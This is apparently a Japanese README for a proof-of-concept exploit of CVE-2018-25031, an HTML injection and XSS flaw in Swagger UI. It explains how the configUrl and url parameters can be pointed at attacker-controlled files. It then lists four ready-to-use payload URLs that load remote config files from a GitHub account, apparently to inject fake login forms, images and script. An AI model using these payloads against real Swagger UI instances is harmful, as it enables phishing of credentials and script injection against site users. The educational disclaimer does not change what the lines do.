
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI は、OpenAPI(旧 Swagger)仕様をインタラクティブな Web インターフェースにレンダリングする、広く使用されているライブラリです。これにより、開発者やインテグレーターはバックエンドの実装がなくても API を探索およびテストできます。
この脆弱性は、Swagger UI クライアントがリモート設定ファイルや仕様ファイルを読み込むために使用する URL クエリパラメータの検証が不十分であることに起因します。関連する一般的なパラメータは次のとおりです。
?url=.yaml?configUrl=.json攻撃者はこれらのパラメータを、攻撃者が管理するリモートでホストされた OpenAPI 定義または設定ファイルにポイントすることができ、脆弱なインスタンスによってレンダリングされる可能性があります。
悪意のあるリモートファイルを読み込むと、ホスティング設定や実施されている保護対策に応じて、いくつかの影響の大きい結果を引き起こす可能性があります。
参考文献:
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
このリポジトリのコンテンツは教育および情報提供のみを目的として提供されています。著者は誤用に対する責任を負いません。使用前に適切な許可を得て、自己責任で責任を持って行動し、すべての法的および倫理的ガイドラインに従ってください。